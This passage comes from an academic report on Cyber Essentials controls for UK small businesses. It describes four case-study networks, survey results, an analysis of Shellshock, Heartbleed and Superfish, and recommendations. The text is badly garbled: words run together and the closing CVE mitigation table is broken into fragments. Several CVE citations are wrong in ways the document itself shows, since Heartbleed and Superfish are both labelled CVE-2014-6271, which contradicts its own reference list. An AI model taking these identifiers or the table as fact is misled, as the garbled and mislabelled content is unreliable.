CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 7 of 28
strong passwords which are recommended tobe changed periodically with the employeemachines configured to automatically lockafter a period of inactivity
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 116 wereapplicable to the second SME network
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web developmentSMEs to operate across multiple web browserson various versions to test and build acustomerrsquos website means that the networkaccumulates all vulnerabilities in web browsersAs this is a specialist case a recommendationfor web development organisations could beto use one up-to-date browser for general useA bespoke policy may then be put in place
When working on alternative browsersemployees should only access client pageswhere the developer has control of the web-content
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure This company islocated at a single site and has equipmentcomposed of a single desktop PC and 2company laptops running on a ADSL router -this same router also provides the internetconnection for the guests An alternativerouter is available as a manual fall-backconnection to the internet but is availableonly to company equipment
The guest network is split from the officenetwork through secondary access point namesfiltering traffic in to a separate VLAN internalto the router
Services No local servers are present toprovide any service to employees or guestson the network
File storage is provided through on-lineservices including Dropbox and Skydrive Astandalone web-server owned and managedexternally runs the company website andbookings are managed via a globally accessiblewebsite
All the services are accessed with SSLsecured connections (HTTPS mainly)
User Access User access is not mediated inany way and any site can be accessed fromany computer Guests have no restrictionsplaced on their network usage either
Operating systems The company uses iOSfor their mobile devices and Windows 81 forthe office desktop and laptop PCs Guests canbring their own equipment so will be a mixof all operating systems currently availableincluding Windows Linux Mac and others
Existing Security Measures Beyond therouterrsquos separation between the guest andoffice networks no other network securitymeasures are in place The office PCs dohave automatic patch installation configuredhowever and have the Kaspersky antivirussuite installed
Mitigation of applicable vulnerabilities Ofthe 200 listed vulnerabilities 103 wereapplicable to the second SME network
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1 SME 4 requires theuse of web browsers for bookings and receptionof guests so enables a wide variety of attackvectors through the web
Thankfully the services and servers theyconnect to are run by larger corporationswhich will hopefully have implemented at leastCyber Essentials-grade security and protectionso the actual risks should be minimal
For the purposes of this report howeverwe assume that if this company has notimplemented Cyber Essentials then theservices they use must also not have leavingthem open to attack
Survey Responses
Data gathered from survey responses affordsa much broader look at the typical networkdeployments and practice in SMEs The fullresults from 17 participants may be found inthe Survey Responses section on page 27
Physical Infrastructure The majority ofrespondents belong to SMEs with 0-9workstations on site this is related to the sizeof an organisation - and could be consideredrepresentative of businesses across the UK
Services Local - File Email Database andDomain Servers are the most common localservice providers all present in more than 13rdof SMEs Remote - Email web hosting andfile-sharing are the most common servicesprovided remotely
User Access More than half of SMEs permitemployeersquos own devices to be used in theworkplace for organisations such as these it isimportant to ensure that employee machinesreceive the same level of protection as therest of the work network - as one vulnerablemachine allows vulnerability into the wholecompany
Existing Security Measures Of the surveyrespondents most SMEs have a firewallpassword policy and data-loss preventionscheme in place These are the mostcommon security measures in place forthe SMEs contacted below this is accesscontrol malware protection and finally patchmanagement which is present in a little overhalf of organisations
Almost two-thirds of survey participantswere previously aware of Cyber Essentials
Survey Respondents Network
The network built from Survey Respondentsdata considers the overall response in order tobuild a network easily adaptable to match thatof the majority of SME network configurations
Locally Email and File servers havebeen represented with domain controllercapabilities represented in a network ADSLRouter Remotely a web server is depictedbut remote services may also include databaseusage email and other web services
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 8 of 28
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents networkaspects of each of the interviewed SMEnetworks is apparent
The Finance SME network shares a localfile server as sensitive information needs tobe kept and processed by the organisationAny SME handling sensitive information willbe likely to strongly consider using local fileservers
The Specialist SME shares with the surveyrespondents data itrsquos use of SSH to connectremotely to services SSH is an important toolfor accessing sensitive date while at home or
data that is stored remotely the workplace
The Web Development SME requiresemployees to connect to many web serversremotely the survey respondents match thiscase with the use of external web-hostingservices That being said in the general-casethis server is more likely to be the SMErsquos ownweb-hosting solution rather than a clients
The Hotel Services SME represents avery basic local network using only cloud-based services remotely This is becoming anincreasingly popular trend for SMEs as cloud-services are often easier to set up and cheaperto maintain This is also representative ofmany SMEs with little-to-no online presence
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 9 of 28
Analysis of CyberEssentials on High ProfileVulnerabilitiesT
he following sections detail three ofthe high-profile vulnerabilities to hit thepopular media in late 2014 to early 2015
These are of particular note as while they maynot be the most damaging of attack vectors(although some are very serious) they havecaught the attention of the public and SMEswould be under pressure to ensure that theywere protected
With this in mind we analyse how effectivethe Cyber Essentials security controls are attackling these high-profile vulnerabilities
ldquoShellShockrdquo
Also known by the name ldquoBashDoorrdquoShellshock hit the news as it attacked theLinux server environment and did so in aparticularly effective manner
GNU Bash through 43 processestrailing strings after functiondefinitions in the values ofenvironment variables which allowsremote attackers to execute arbitrarycode via a crafted environment asdemonstrated by vectors involvingthe ForceCommand feature inOpenSSH sshd the mod cgi andmod cgid modules in the ApacheHTTP Server scripts executedby unspecified DHCP clients andother situations in which setting theenvironment occurs across a privilegeboundary from Bash execution akaldquoShellShockrdquo NOTE the originalfix for this issue was incorrect CVE-2014-7169 has been assigned tocover the vulnerability that is stillpresent after the incorrect fix
CVE-2014-6271[13]
The exploit allowed attackers to directlyexecute arbitrary shell commands on acompromised system by altering environmentvariables However the bug was not enoughby itself to actually enable attackers tocompromise a system but allowed accessvia other services While the exploit is onlyeffective if the bash environment can bealtered the results can be devastating asit lays bare the entire system to many otherforms of attack
The threat was particularly insidious forSMEs who used LinuxUnix based servers forservices mail servers as an example as theywould potentially have no idea that they hadbeen compromised
ldquoHeartbleedrdquo
Appearing in April 2014 the CVE-2014-6271(aka rdquoHeartbleedrdquo) bug allowed attackers todirectly read the active memory of a targetmachine through buffer over-read This thenallowed attackers to access private credentials(or indeed anything else) in the RAM of thetarget
As described in the original CVE report
The (1) TLS and (2) DTLSimplementations in OpenSSL 101before 101g do not properlyhandle Heartbeat Extension packetswhich allows remote attackers toobtain sensitive information fromprocess memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading privatekeys related to d1 bothc andt1 libc aka the Heartbleed bug
CVE-2014-6271[12]
As OpenSSL is a core part of manyapplications and services both in the openand closed source world this vulnerabilityhad the potential to damage a huge numberof systems At the time of release varioussources (including for example Netcraft[15])that up to 17 of trusted SSL-certified serverswere vulnerable to the attack
Depending on how the SME in questionoperates the threat this particular CVE posed(and indeed still poses with still as yetto be updated servers still online with thevulnerability) is difficult to discern Obviouslythe vulnerability is serious but the ability ofindividual SMEs to detect and correct this flawwill vary greatly depending on the individualdeployments
Larger companies with their ownLinuxUnix servers may have be able to deploythe patched OpenSSL version as soon as thepatch was available but smaller businesses
or those with more cloud-based services maynot have access to the software running onthe servers they use and may be at the mercyof the respective operators to implement thefix Because of this patch management onlypartially remedies this vulnerability and otherprotection methods from the Cyber Essentialsguidelines such as securing configurations orcontrolling access will have unknown effects
It is vulnerabilities such as this that posethe greatest threat to SME networks as themethods to fix the issue are often outside thecontrol of the company potentially leavingthem vulnerable far longer than one wouldexpect
ldquoSuperfishrdquo
The SDK for Komodia Redirectorwith SSL Digestor as usedin Lavasoft Ad-Aware WebCompanion 118851766 and Ad-Aware AdBlocker (alpha) 13691Qustodio for Windows AtomSecurity Inc StaffCop 58 andother products uses the sameX509 certificate private key fora root CA certificate across differentcustomersrsquo installations whichmakes it easier for man-in-the-middleattackers to spoof SSL servers byleveraging knowledge of this keyas originally reported for SuperfishVisualDiscovery on certain LenovoNotebook laptop products
CVE-2014-6271[14]
This vulnerability is particularly interestingas the software causing the issue waseffectively brokered by a trusted hardwarevendor namely Lenovo Because the issuewas part of the lsquonormal configurationrsquo forthe equipment it remained undetected fora long time and hints that there may befurther breaches in security as yet undiscoveredin both Lenovo and other manufacturerrsquosequipment
The vector is through the SuperFishsoftware essentially breaking the chain of trustfor SSL certificates by installing a self-signingcertificate in to the list of trusted certificateson the host machine This allows an attackerto simply sign their own code via the same
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 10 of 28
certificate which itself can be easily gatheredfrom any other machine running SuperFishand they have full access to any SSL-securedconnection from the target machine
Thankfully while the risks to users andSMEs was high the fix is a simple one-timerun of a removal tool provided by Lenovothemselves[11] and is mitigated fully throughthe Cyber Essentials patch managementadvice
Threat Analysis
ShellShock Without Cyber Essentials inplace SME 1 and 2 would be at risk fromlsquoShellshock as they both operate UnixLinuxbased systems that would require patching toplug the security issue The extent at whichSMEs 3 and 4 are vulnerable to this issue isunclear as their large dependency on outside
service providers leaves them in a positionwhere they are both unable to determine theirvulnerability and additionally unable to remedyit
With Cyber essentials SME 1 and 2 wouldbe fully protected and it is likely that SME3 and 4 are also protected if the externalproviders also use a Cyber Essentials or othersecurity and patching schemes
Heartbleed The lsquoHeartbleedrsquo bug is anothervulnerability that without Cyber Essentialsguidelines being followed would have laidcompanies external-facing services open tomalicious attackers
In all cases however each SME can befully protected with a combination of patchmanagement firewalling and application ofaccess controls from the Cyber Essentialsguidelines
SuperFish All of the SMEs we interviewedcould be exceedingly vulnerable to thelsquoSuperfishrsquo issue without Cyber Essentialsas much of their operations revolve aroundSSL encrypted communications A break inthe chain-of-trust for their certificates wouldallow an attacker to man-in-the-middle theircommunications
Normal system updates would have failedto remedy the situation as the fix providedby Lenovo consisted of a tool to be runin addition to the normal operating systempatches It is further debatable how effectiveCyber Essentials patch management wouldhave been in plugging this vulnerability as itwould require that the administrators be awareof the issue and know of the patch rather thansimply following lsquonormalrsquo patching guidelinesAssuming that the persons responsible for theequipment are aware of the issue howeverthen Cyber Essentials patch management fullymitigates this issue
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 11 of 28
ConclusionsT
he Cyber Essentials Security Tools havebeen shown to mitigate or to mitigateas soon as a patch is released all
vulnerabilities from remote attackers that donot exploit fundamentally insecure software orhardware Of the two-hundred vulnerabilitiescollected eight exploits were not able tobe resolved with the deployment of securitypatches for vulnerabilities such as these theonly mitigation available is simply not to installthe compromised systems To help preventdeployments being susceptible to attacks onfaulty systems it may be recommended that ablacklist of such items is composed for publicreference
Scope It is important to consider that thescope of this study covers only internet-basedcommodity-level attacks and although theCyber Essentials tools performs very well inmitigating this it does not represent fullsecurity There is an increasingly identifiedrisk from insiders that also requires attentionnot least malicious acts but also from usersunknowingly compromising security
The SMEs interviewed representorganisations from a range of market sectorsin web development and online presencespecialist scientific services the hospitalityindustry and finance
Additional Tools
The 10 Steps to Cyber Security[2] identifiesadditional security measures that supportthe Cyber Essentials Scheme well todeliver additional security through indirectmeasures such as User Education Awarenessalong with Network and Systems MonitoringThese additional measures would serve tobolster cyber security through fortifyingeach employee of the SME with necessaryknowledge on safe practice itrsquos importanceand some technical basic understanding -just as they may be versed in environmentalawareness Network and Systems Monitoringallows for remote user logins as well as fileaccess and activity to be logged For verysmall networks this may be currently infeasibleas the extra manpower or finances required for
such a system are costly However for largeorganisations additional monitoring capabilityshould be explored as a future extension tothe Cyber Essentials not just to identify andmitigate malicious action for more bespokeand sophisticated attacks than those reportedon but to also aid in providing evidence forany potential cyber-crime investigations
There exist some collective approaches toimproving cyber-security a notable example ofthis is The Cyber-security Information SharingPartnership (CiSP)[4] The partnership aimsto benefit all members by providing real-time updates on issues of cyber-securityand discovered vulnerabilities as well asbest-practice guides and other cyber-threatinformation It would be beneficial formore organisations to belong to cyber-securitycollectives like this creating networks ofinformed individuals working together to tacklecyber-crime This would be particularly usefulto quickly identify potential vulnerabilitiesand possible patches which as shown inthis report is critical for the CE patchmanagement security control to fully mitigaterelated vulnerabilities
An important note to be made is towardthe security of business affiliates and serviceproviders Even if an SME has CyberEssentials in place any use of cloud-servicesrelies on the vendorrsquos security controls forthreat mitigation In other words cloud-email accounting and any other cloud-basedor remote services are only as secure as theservice provider makes it In general cloud-providers should be holding a high level ofscrutiny to their security practice and shouldbe encouraged to certify their protectionHewlett-Packard(HP) has taken this furtherand has begun to strengthen itrsquos entire supply-chain ( 600 SMEs) with the Cyber Essentialsaccreditation This provides protection acrossthe entirety of Hewlett Packardrsquos operationsas well as itrsquos affiliates This should be agoal for organisations of all sizes minimisingthe risk from cyber-threats by ensuring alltrading partners uphold the same high levelsof security
Cyber Essentials Controls
Of the five current Cyber Essentials ControlsPatch Management was considered to aid inthe mitigation of the highest proportion ofremote attacks (875 ) counter-intuitivelythe Survey responses had patch managementranked last in use for SMEs The highestcurrently used controls could be seen asthose providing the most intuitive or easilyunderstood protection Data loss preventionstrong passwords and firewall While patchmanagement isnrsquot necessarily understood byindividuals as a tool to greatly improve cyber-security
Anti-Malware was useful in mitigating theleast (10 ) vulnerabilities It is howeverimportant to note that Anti-Malware is largelythe only security tool that may routinely scanthe network hardware and software as wellas any items downloaded from the internetor as email attachments This serves as alast line of defence and as such is vital to anorganisationrsquos cyber-safety
Recommendations
To further improve cyber-security across theUK we recommend that
1 Collective approaches to cyber securityshould be further encouraged Inparticular a governmentalcollectiveapproach to identifying inherently flawedproducts should be developed Thiscould be in addition to or as an extensionto current initiatives like CiSP whichcan make a difference in detecting andreacting on potential vulnerabilities in atimely manner
2 Further research into the mitigation ofother cyber-threats is carried out toexplore the risk from insider-threats andtargeted attacks
3 Further employee education is stronglyencouraged specially to be able totackle these other types of attacksmentioned above which were not underthe scope of this report
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 12 of 28
References[1] Centre for the Protection of
National Infrastructure CESGCabinet Office InnovationDepartment for Business andSkills Cyber security guidance forbusiness httpswwwgovuk
governmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[2] Centre for the Protection ofNational Infrastructure CESGCabinet Office and Innovation amp SkillsDepartment for Business 10 stepsto cyber security httpswwwgov
ukgovernmentpublicationscyber-
risk-management-a-board-level-
responsibility September 2012
[3] Innovation CESG UK Trade ampInvestment Prime Ministerrsquos Office10 Downing Street Centre for theProtection of National InfrastructureGovernment CommunicationsHeadquaters UK Trade amp Departmentfor Business and Skills Cyber securityboost for uk firms httpswww
govukgovernmentnewscyber-
security-boost-for-uk-firmsJanuary 2015
[4] Centre for the Protection ofNational Infrastructure CiSPCERT-UK and Innovation amp SkillsDepartment for Business Cyber-securityinformation sharing partnership (cisp)httpswwwcertgovukcispMarch 2013
[5] CREST Cyber essentialscertified companies http
wwwcyberessentialsorglistMarch 2015
[6] CVEMitreorg Terminology - mitreorghttpcvemitreorgabout
terminologyhtml
[7] Cyber Essentials Cyber essentialsscheme - overview httpswwwgov
ukgovernmentpublicationscyber-
essentials-scheme-overview
[8] CESG Cabinet Office Centre for theProtection of National InfrastructureDepartment for Business Innovationamp Skills Common cyber attacksReducing the impact https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400106Common_Cyber_Attacks-
Reducing_The_Impactpdf January2015
[9] UK Cyber Security Forum Northwest cyber security clusterhttpwwwukcybersecurityforum
comindexphpcyber-security-
clustersnorth-west-lsquo-cluster2015
[10] HM Government Cyber essentialscertified companies https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file400914bis-15-72-cyber-
essentials-scheme-assurance-
frameworkpdf January 2015
[11] Lenovo Superfish uninstall instructionshttpsupportlenovocomus
enproduct_securitysuperfish_
uninstall
[12] Mitreorg Cve-2014-0160 akaheartbleed httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-0160 2014
[13] Mitreorg Cve-2014-6271 akashellshock httpcvemitreorg
cgi-bincvenamecginame=CVE-
2014-6271 2014
[14] Mitreorg Cve-2015-2077 aka superfishhttpcvemitreorgcgi-bin
cvenamecginame=CVE-2015-20772015
[15] Netcraft Half a million widely trustedwebsites vulnerable to heartbleedbug httpnewsnetcraftcom
archives20140408half-a-
million-widely-trusted-websites-
vulnerable-to-heartbleed-
bughtml April 2014
[16] Cabinet Office The uk cyber securitystrategy - protecting and promotingthe uk in a digital world https
wwwgovukgovernmentuploads
systemuploadsattachment_data
file60961uk-cyber-security-
strategy-finalpdf November 2011
[17] Cabinet Office and The Rt HonFrancis Maude MP Governmentmandates new cyber security standardfor suppliers httpswwwgov
ukgovernmentnewsgovernment-
mandates-new-cyber-security-
standard-for-suppliers September2014
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 13 of 28
Cyb
erC
ontr
ols
App
licab
ility
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-0
00
8y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(U
ser
Po
licy)
A
nti
-Mal
war
eC
VE
-20
13
-00
22
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-00
84
yy
yn
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-0
14
0y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
14
9n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-01
72
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-U
ser
Acc
ess
(Str
on
gP
assw
ord
)P
atch
Man
agem
ent
CV
E-2
01
3-0
17
4n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-01
99
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
ampS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-02
53
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Ser
ver)
CV
E-2
01
3-0
27
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
48
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
59
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
61
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
63
3y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Fir
mw
are
Man
agem
ent
CV
E-2
01
3-0
64
9y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
sin
g)
Pat
chM
anag
emen
tC
VE
-20
13
-07
46
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-07
53
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-07
87
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-0
90
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
03
5y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-1
10
2n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-11
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-1
14
4n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
15
3y
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
18
1n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-13
03
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-13
84
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
CV
E-2
01
3-1
38
8n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-1
45
0y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-1
47
2y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Acc
ess
Po
licy)
CV
E-2
01
3-1
55
3y
ny
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
62
0y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-1
62
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
63
8y
yy
yn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
66
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
67
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-1
70
0y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tA
nti
-Mal
war
eC
VE
-20
13
-17
34
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-17
77
nn
yn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Pat
chM
anag
emen
tC
VE
-20
13
-23
19
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
C
VE
-20
13
-23
40
nn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 14 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
3-2
35
0n
yn
ny
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
ampF
irew
all
CV
E-2
01
3-2
49
2y
ny
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-25
07
yn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Fir
mw
are
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
3-2
73
6y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-2
78
0n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-28
03
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
tro
ng
Pas
swor
ds
Pat
chM
anag
emen
tsC
VE
-20
13
-28
24
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-2
82
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-29
20
ny
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-30
64
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
16
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
37
yy
yy
nN
ot
Mit
igat
edM
itig
ated
-A
nti
-Mal
war
eS
ecu
reC
on
fig
ura
tio
n(D
on
rsquotIn
stal
l)C
VE
-20
13
-31
94
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-31
99
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
01
yn
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
06
yn
yy
nN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-32
80
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tamp
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
3-3
38
7n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n
Pat
chM
anag
emen
tC
VE
-20
13
-34
17
nn
nn
nN
ot
Mit
igat
edM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-3
63
2y
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Acc
ess
Po
licy
(Str
on
gP
assw
ord
)F
irew
all
CV
E-2
01
3-3
65
6n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
85
6y
yy
yy
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tF
irew
all
An
ti-M
alw
are
CV
E-2
01
3-3
86
0y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
3-3
89
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n-
no
JS
CV
E-2
01
3-3
89
7y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Web
site
Bla
cklis
tin
gC
VE
-20
13
-39
00
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-3
90
5y
yn
yn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-42
23
yn
nn
nN
ot
Mit
igat
edN
ot
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
(Do
nrsquot
inst
all)
CV
E-2
01
3-4
43
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
47
8n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
nC
VE
-20
13
-45
29
nn
nn
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-45
55
yn
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
13
-47
76
yn
nn
nN
ot
Mit
igat
edM
itig
ated
-F
irew
all
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
3-4
78
2n
nn
nn
No
tM
itig
ated
No
tM
itig
ated
-S
ecu
reC
on
fig
ura
tio
n(D
on
rsquotin
stal
l)C
VE
-20
13
-50
57
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tS
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
W
ebsi
teB
lack
listi
ng
CV
E-2
01
3-5
36
9n
nn
nn
No
tM
itig
